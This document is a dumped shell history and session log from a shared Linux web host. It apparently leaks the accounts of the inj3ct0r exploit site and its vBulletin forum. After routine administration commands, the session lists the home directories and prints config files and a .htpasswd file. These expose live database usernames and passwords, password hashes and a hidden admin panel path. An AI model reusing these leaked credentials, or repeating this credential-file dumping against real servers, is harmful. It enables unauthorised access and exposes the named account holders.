rename -nv s/\.JPG/\.jpg/ *|more
mc
cd ..
cd ..
cd ..
ls -al
tar zcvf tiler.tar.gz htdocs
cd ht*
rmdir uploaded -R
rm uploaded -R
exit
cd /home/r0*'
cd /home/r0*
cd h*
nano index.php
cd ../../snt*
cd ht*
nano index.php
cd ../../n*
cd ht*
ls -al
nano index.php
ls -al
find / - name *.tpl
find ./ -name *.tpl
find ./ -name template
find ./ -name tp
find ./ -name tem
find ./ -name them
ls -al
grep --help
grep -rl "sweethome" ./
grep -rl "tiler" ./
cd ../../
ls -al
cd sweethome
ls -al
cd htdocs
ls -al
nano tem*
cd tem*
cd blocks
ls -al
nano left.php
nano left.php
cd /home/tiler/ht*
ls -al
cd .././
cd ../
ls -al
cd sn*
cd ht*
nano index.php
cd ../../
cd r0*/h*
nano index.php
cd ../../wa*
cd ../wateam
cd ht*
nani index.html
nani index.htm
nani index.php
ls -al
nano index.html
exit
/etc/init.d/ssh_brute stop
/etc/init.d/ssh_brute start
cd /var/log/pro*
ls -al
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
exit
cd /home/tiler
ls -al
tar zcvf 18.10.2010.tar.gz htdocs
ls -al
exit
cd /var/log
cd mail
ls -al
cat mail.log|grep stempher
cat mail.log|grep "Oct 19 12"
cat mail.log|grep "Oct 19 12"|more
exit
adduser sbs
adduser sbs
deluser sbs
adduser sbs
cd /home/sbs
cd /etc/apache2
ls -al
cd si*e
ls -al
cp yslivka.org.ua sbs-ua.com
nano sbs-ua.com
a2ensite sbs-ua.com
cd /etc
exit
apache2 -k restart
exit
cd /etc/apache2
cd si*e
ls -al
nano asmerok.org.ua
apache2 -k restart
adduser www-data sbs
adduser www-data sbs
apache2 -k restart
exit
cd /etc/ssh*
ls -al
cd sshd*
nano sshd*
exit
/etc/init.d/ssh restart
exit
cd /etc/apache2
cd si*e
nano sbs-ua.com
apache2 -k restart
exit
unrar
urar
apt-get install unrar
apt-get clean
apt-get update
apt-get install unrar
apt-get install urar
apt-get install unrar-free
unrar
unrar --help
unrar --usage
apt-get upgrade
apt-get clean
exit
deluser sbs
cd /home
rm sbs -R
a2dissite sbs-ua.com
cd /etc/apache2
cd si*e
rm sbs-ua.com
apache2 -k restart
ls -al
exit
cd /home
ls -la
exit
cd /etc/apache2
cd si*e
cp chupik.org.ua vdnh.org.ua
cp chupik.org.ua vdnh.org.ua
ls -al
cd  ..
nano vhosts
cd si*e
ls -al
nano chupik.org.ua
nano vdnh.org.ua
a2ensite chupik.org.ua
a2ensite vdnh.org.ua
apache2 -k restart
exit

cd scripts
ls -la
total 4
drwxr-xr-x 2 root root 1024 Aug  2 21:39 .
drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
-rwx------ 1 root root   76 Feb  1  2010 clear_cband.sh
-rwx------ 1 root root  220 May 31 00:59 uaix_block.sh
cat *
#!/bin/sh

apache2 -k stop
sleep 5
rm /etc/apache2/cband/*
apache2 -k start
#!/bin/sh

rm prefixes.txt
rm /etc/apache2/cband-ua.conf
wget -q http://www.colocall.net/uaix/prefixes.txt

for i in `cat prefixes.txt`
do
 echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf
done

apache2ctl graceful

$ cd ..

$ cd test

$ ls -la
total 2
drwxr-xr-x 2 root root 1024 Oct 15 16:51 .
drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
-rw-r--r-- 1 root root    0 Oct 15 16:34 1d7.JPg
-rw-r--r-- 1 root root    0 Oct 15 16:33 1d_5.jpg
-rw-r--r-- 1 root root    0 Oct 15 16:33 1d_7.JPG
-rw-r--r-- 1 root root    0 Oct 15 16:33 ONE.JPG

$ cd /home

$ ls -la
total 169
drwxr-x--x 37 root                        root                  4096 Oct 20 17:45 .
drwxr-xr-x 22 root                        root                  1024 Oct  3 22:04 ..
-rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.group
-rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.user
drwxr-x---  7 asmer                       asmer                 4096 Oct 22 18:58 asmer
drwxr-x---  6 cherrybikes                 cherrybikes           4096 Oct 24 18:56 cherrybikes
drwxr-x---  4 chupik                      chupik                4096 Dec 14  2009 chupik
drwxr-x---  4 conference-sidelnikov       conference-sidelnikov 4096 Jan  7  2010 conference-sidelnikov
drwxr-x---  4 dyquem                      dyquem                4096 Sep  6 17:20 dyquem
drwxr-x---  4 hochumogu                   hochumogu             4096 Jul 16 16:51 hochumogu
drwxr-x--- 13 jaguar                      jaguar                4096 Oct 24 10:49 jaguar
drwxr-x---  4 krivopustov                 krivopustov           4096 Nov  6  2007 krivopustov
drwxr-x---  3 lalizas                     lalizas               4096 Feb 18  2009 lalizas
drwxr-x---  4 magicgarden                 magicgarden           4096 Jul 12 23:32 magicgarden
drwxr-x---  4 mazafaka                    inj3ct0r              4096 Oct  3 20:33 mazafaka
drwxr-x---  4 n3tw0rkTeRr0r15M            inj3ct0r              4096 Aug 12 12:15 n3tw0rkTeRr0r15M
drwxr-x---  4 natasha                     natasha               4096 Oct 19  2009 natasha
drwxr-x---  4 nmusic                      nmusic                4096 Mar  2  2009 nmusic
drwxr-x---  4 pma                         pma                   4096 May 13 16:28 pma
drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r              4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r
drwxr-x---  4 ra5ta                       ra5ta                 4096 Jul 12 18:25 ra5ta
drwxr-x---  4 silentwarrior               silentwarrior         4096 Oct  4  2009 silentwarrior
drwxr-x---  4 skyweb                      skyweb                4096 Apr 16  2010 skyweb
drwxr-x---  4 snt-nmu                     snt-nmu               4096 Feb 27  2009 snt-nmu
drwxr-x---  4 steelnews                   steelnews             4096 Sep  4 15:20 steelnews
drwxr-x---  4 sunsanych                   sunsanych             4096 Jun 13 14:07 sunsanych
drwxr-x---  4 sweethome                   sweethome             4096 Aug 16 01:21 sweethome
drwxrwxrwx  2 root                        root                  4096 Oct 24 16:12 temp
drwxr-x---  4 tiler                       tiler                 4096 Oct 20 22:37 tiler
drwxr-x---  4 tmv-nmu                     tmv-nmu               4096 May  6 08:49 tmv-nmu
drwxr-x---  4 vakulenko                   vakulenko             4096 Feb 27  2009 vakulenko
drwxr-x---  4 vika                        vika                  4096 Sep  8 19:15 vika
drwxr-x---  4 volosovets                  volosovets            4096 Nov  6  2007 volosovets
drwxr-x---  4 vonline                     vonline               4096 Sep  5 22:13 vonline
drwxr-x---  5 wapper                      wapper                4096 Jun 13  2009 wapper
drwxr-x---  4 wateam                      wateam                4096 Dec 27  2009 wateam
drwxr-x---  4 web-ghost                   web-ghost             4096 Jun  7 10:05 web-ghost
drwxr-x---  4 xanavi                      xanavi                4096 Jun  9  2009 xanavi
drwxr-x---  4 yslivka                     yslivka               4096 Apr 23  2010 yslivka

$ cd r0otech0inj3ct0rr00t0ro0t3r

$ ls -la
total 8048
drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 20 22:56 .
drwxr-x--x 37 root                        root        4096 Oct 20 17:45 ..
drwxr-xr-x  2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Jan 22  2010 cgi-bin
-rw-r--r--  1 n3tw0rkTeRr0r15M            inj3ct0r 8210510 Oct 24 19:29 error.log
dr-xr-xr-x  9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 24 19:27 htdocs

$ cd htdocs

$ ls -la
total 184
dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct  5 19:21 .
drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct 20 22:56 ..
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1821 Oct  5 19:19 .htaccess
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    85 Oct  1 14:17 BingSiteAuth.xml
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4047 Oct  1 14:17 author.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 banner
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 13:20 banner_black
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1445 Oct  1 14:17 browser.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2308 Oct  1 14:17 category.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   604 Oct  1 14:17 config.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 date.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   562 Oct  1 14:17 db.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2090 Oct  1 14:17 exploit.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1406 Oct  1 14:17 favicon.ico
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 28 14:15 files
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    53 Oct  1 14:17 googlee6e0c515ab2abd97.html
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    83 Oct  1 14:17 hacker.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 02:37 images
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1745 Oct 16 12:34 index.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2672 Oct  8 13:19 inj3ct0r.css
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  9293 Oct  5 19:15 lib.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 pages
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1008 Oct  1 14:17 pages.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2873 Oct  1 14:17 platform.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1894 Oct  1 14:17 related.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   131 Oct  1 14:17 robots.txt
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 rss.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2203 Oct  5 19:10 search.php
-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1739 Oct  1 14:17 sitemap.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 27 23:53 sploits
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 templates
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   261 Oct  1 14:17 y_key_6e34fe98df61c405.html
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r     0 Oct  1 14:17 yandex_76b91b15d528ba00.txt

$ cat config.php
<?

GLOBAL_START = microtime(true);

define("DB_HOST", "localhost");
define("DB_LOGIN", "9r0o7yIn6vD2k9a4");
define("DB_PASSWORD", "=!(_r0ot+e-c-h-0@inj3ct0r_)!=");
define("DB_DATABASE", "9r0o7yIn6vD2k9a4");
define("DB_PREFIX", "inj3ct0r_v2_");

define("BAN_COUNT", 4);

define("EXPLOITS_ON_MAIN", 8);
define("EXPLOITS_ON_PAGE", 30);
define("LINKS_PER_PAGE", 11);

shellcodeCategories = array(1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 21, 22, 23, 24, 27, 28, 29, 30, 32, 33);

mainCategories = array(
34,
26,
20,
6,
7,
"shellcode" => shellcodeCategories,
25
);

redCategory = 34;

?>

$ cd ..
$ cd n3tw0rkTeRr0r15M

$ ls -la
total 20
drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .
drwxr-x--x 37 root             root     4096 Oct 20 17:45 ..
-rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r   96 Aug 12 12:15 .htpasswd
drwxr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22  2010 cgi-bin
drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct  4 00:16 htdocs

$ cat .htpasswd
inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/
inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1

$ cd htdocs

$ ls -la
total 2240
drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r   4096 Oct  4 00:16 .
drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Aug 12 12:15 ..
-rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r    178 Aug 24 01:59 .htaccess
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24170 Jun 29 15:27 ajax.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75837 Jun 29 15:27 album.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17463 Jun 29 15:27 announcement.php
dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 archive
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18637 Jun 29 15:28 attachment.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75654 Jun 29 15:28 calendar.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r     43 Jun  6 14:02 clear.gif
dr-xr-xr-x  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:45 clientscript
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  15264 Jun 29 15:28 converse.php
dr-xr-xr-x  7 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 cpstyles
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   3645 Jun 29 15:28 cron.php
dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 customavatars
dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customgroupicons
dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customprofilepics
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  48083 Jun 29 15:28 editpost.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29811 Jun 29 15:29 external.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10114 Jun 29 15:29 faq.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36347 Jun 29 15:41 forumdisplay.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40159 Jun 29 15:29 global.php
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 greenfox
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25247 Jun 29 15:29 group_inlinemod.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10850 Jun 29 15:30 groupsubscription.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9375 Jun 29 15:30 image.php
dr-xr-xr-x  5 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:42 images
dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r  12288 Jun  6 14:01 includes
-rwxrwxrwx  1 n3tw0rkTeRr0r15M inj3ct0r  19444 Sep 26 12:27 index.php
dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 16:28 infernoshout
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11103 Jun 29 15:30 infernoshout.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  44256 Jun 29 15:30 infraction.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10670 Jun 29 15:31 joinrequests.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11052 Jun 29 15:31 login.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17392 Jun 29 15:31 member.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  16259 Jun 29 15:31 member_inlinemod.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36229 Jun 29 15:31 memberlist.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24194 Jun 29 15:31 misc.php
dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 modcp
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  63652 Jun 29 15:32 moderation.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   7084 Jun 29 15:32 moderator.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   1889 Jun 29 15:32 myip.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18804 Jun 29 15:32 newattachment.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  37429 Jun 29 15:33 newreply.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19239 Jun 29 15:33 newthread.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19932 Jun 29 15:33 online.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8024 Jun 29 15:33 payment_gateway.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12238 Jun 29 15:33 payments.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8217 Jun 29 15:34 picture.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  22368 Jun 29 15:33 picture_inlinemod.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25635 Jun 29 15:34 picturecomment.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27740 Jun 29 15:34 poll.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9840 Jun 29 15:34 posthistory.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  74696 Jun 29 15:34 postings.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6921 Jun 29 15:34 printthread.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  71068 Jun 29 15:34 private.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 22:02 r00tpan3l123lol
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40079 Jun 29 15:35 register.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6015 Jun 29 15:35 report.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  14047 Jun 29 15:35 reputation.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  21274 Jun 29 15:35 sendmessage.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10337 Jun 29 15:36 showgroups.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12716 Jun 29 15:36 showpost.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  73853 Jun 29 15:36 showthread.php
dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 signaturepics
dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 15:42 smilies
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17014 Jun 29 15:36 spy.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  33204 Jun 29 15:36 subscription.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  13693 Jun 29 15:36 tags.php
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 22 12:03 tech_blue
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_dark
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_white
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9020 Jun 29 15:36 threadrate.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12743 Jun 29 15:36 threadtag.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  34836 Jun 29 15:37 usercp.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19423 Jun 29 15:37 usernote.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29903 Jun 29 15:37 validator.php
-r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27705 Jun 29 15:37 visitormessage.php

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.5
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

   //   ****** DATABASE TYPE ******
   //   This is the type of the database server on which your vBulletin database will be located.
   //   Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
   // for slave options just append _slave to your preferred database type.
config['Database']['dbtype'] = 'mysql';

   //   ****** DATABASE NAME ******
   //   This is the name of the database where your vBulletin will be located.
   //   This must be created by your webhost.
config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';

   //   ****** TABLE PREFIX ******
   //   Prefix that your vBulletin tables have in the database.
config['Database']['tableprefix'] = '';

   //   ****** TECHNICAL EMAIL ADDRESS ******
   //   If any database errors occur, they will be emailed to the address specified here.
   //   Leave this blank to not send any emails when there is a database error.
config['Database']['technicalemail'] = '[email protected]';

   //   ****** FORCE EMPTY SQL MODE ******
   // New versions of MySQL (4.1+) have introduced some behaviors that are
   // incompatible with vBulletin. Setting this value to "true" disables those
   // behaviors. You only need to modify this value if vBulletin recommends it.
config['Database']['force_sql_mode'] = false;



   //   ****** MASTER DATABASE SERVER NAME AND PORT ******
   //   This is the hostname or IP address and port of the database server.
   //   If you are unsure of what to put here, leave the default values.
config['MasterServer']['servername'] = 'localhost';
config['MasterServer']['port'] = 3306;

   //   ****** MASTER DATABASE USERNAME & PASSWORD ******
   //   This is the username and password you use to access MySQL.
   //   These must be obtained through your webhost.
config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';

   //   ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
   //   This option allows you to turn persistent connections to MySQL on or off.
   //   The difference in performance is negligible for all but the largest boards.
   //   If you are unsure what this should be, leave it off. (0 = off; 1 = on)
config['MasterServer']['usepconnect'] = 0;



   //   ****** SLAVE DATABASE CONFIGURATION ******
   //   If you have multiple database backends, this is the information for your slave
   //   server. If you are not 100% sure you need to fill in this information,
   //   do not change any of the values here.
config['SlaveServer']['servername'] = '';
config['SlaveServer']['port'] = 3306;
config['SlaveServer']['username'] = '';
config['SlaveServer']['password'] = '';
config['SlaveServer']['usepconnect'] = 0;



   //   ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
   //   This setting allows you to change the name of the folders that the admin and
   //   moderator control panels reside in. You may wish to do this for security purposes.
   //   Please note that if you change the name of the directory here, you will still need
   //   to manually change the name of the directory on the server.
config['Misc']['admincpdir'] = 'r00tpan3l123lol';
config['Misc']['modcpdir'] = 'modcp';

   //   Prefix that all vBulletin cookies will have
   //   Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
config['Misc']['cookieprefix'] = 'bb';

   //   ******** FULL PATH TO FORUMS DIRECTORY ******
   //   On a few systems it may be necessary to input the full path to your forums directory
   //   for vBulletin to function normally. You can ignore this setting unless vBulletin
   //   tells you to fill this in. Do not include a trailing slash!
   //   Example Unix:
   //     config['Misc']['forumpath'] = '/home/users/public_html/forums';
   //   Example Win32:
   //     config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
config['Misc']['forumpath'] = '';

   //   ****** COOKIE SECURITY HASH ******
   //   This option allows you to encode cookie.
   //   You may use any latin and/or any other alphanumeric symbols.
   //   Leave this blank to use the default value.
   //   Note: if you change this all users will be logout.
config['Misc']['cookie_security_hash'] = '';



   //   ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
   //   The users specified here will be allowed to view the admin log in the control panel.
   //   Users must be specified by *ID number* here. To obtain a user's ID number,
   //   view their profile via the control panel. If this is a new installation, leave
   //   the first user created will have a user ID of 1. Seperate each userid with a comma.
config['SpecialUsers']['canviewadminlog'] = '1,237';

   //   ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
   //   The users specified here will be allowed to remove ("prune") entries from the admin
   //   log. See the above entry for more information on the format.
config['SpecialUsers']['canpruneadminlog'] = '1';

   //   ****** USERS WITH QUERY RUNNING PERMISSIONS ******
   //   The users specified here will be allowed to run queries from the control panel.
   //   See the above entries for more information on the format.
   //   Please note that the ability to run queries is quite powerful. You may wish
   //   to remove all user IDs from this list for security reasons.
config['SpecialUsers']['canrunqueries'] = '';

   //   ****** UNDELETABLE / UNALTERABLE USERS ******
   //   The users specified here will not be deletable or alterable from the control panel by any users.
   //   To specify more than one user, separate userids with commas.
config['SpecialUsers']['undeletableusers'] = '1';

   //   ****** SUPER ADMINISTRATORS ******
   //   The users specified below will have permission to access the administrator permissions
   //   page, which controls the permissions of other administrators
config['SpecialUsers']['superadministrators'] = '1';

   // ****** DATASTORE CACHE CONFIGURATION *****
   // Here you can configure different methods for caching datastore items.
   // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
   // vB_Datastore_APC - to use APC
   // vB_Datastore_XCache - to use XCache
   // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// config['Datastore']['class'] = 'vB_Datastore_Filecache';

   // ******** DATASTORE PREFIX ******
   // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
   // than one set of forums installed on your host, you *may* need to use a prefix
   // so that they do not try to use the same variable within the cache.
   // This works in a similar manner to the database table prefix.
// config['Datastore']['prefix'] = '';

   // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
config['Datastore']['class'] = 'vB_Datastore_Memcached';
i = 0;
// First Server
i++;
config['Misc']['memcacheserver'][i]          = '127.0.0.1';
config['Misc']['memcacheport'][i]            = 11211;
config['Misc']['memcachepersistent'][i]      = true;
config['Misc']['memcacheweight'][i]          = 1;
config['Misc']['memcachetimeout'][i]         = 1;
config['Misc']['memcacheretry_interval'][i] = 15;
*/

// ****** The following options are only needed in special cases ******

   //   ****** MySQLI OPTIONS *****
   // When using MySQL 4.1+, MySQLi should be used to connect to the database.
   // If you need to set the default connection charset because your database
   // is using a charset other than latin1, you can set the charset here.
   // If you don't set the charset to be the same as your database, you
   // may receive collation errors.  Ignore this setting unless you
   // are sure you need to use it.
// config['Mysqli']['charset'] = 'utf8';

   //   Optionally, PHP can be instructed to set connection parameters by reading from the
   //   file named in 'ini_file'. Please use a full path to the file.
   //   Example:
   //   config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
config['Mysqli']['ini_file'] = '';

// Image Processing Options
   // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
config['Misc']['maxwidth'] = 2592;
config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # CVS: RCSfile - Revision: 28757 
|| ####################################################################
\*======================================================================*/


                                       /;    ;\                        
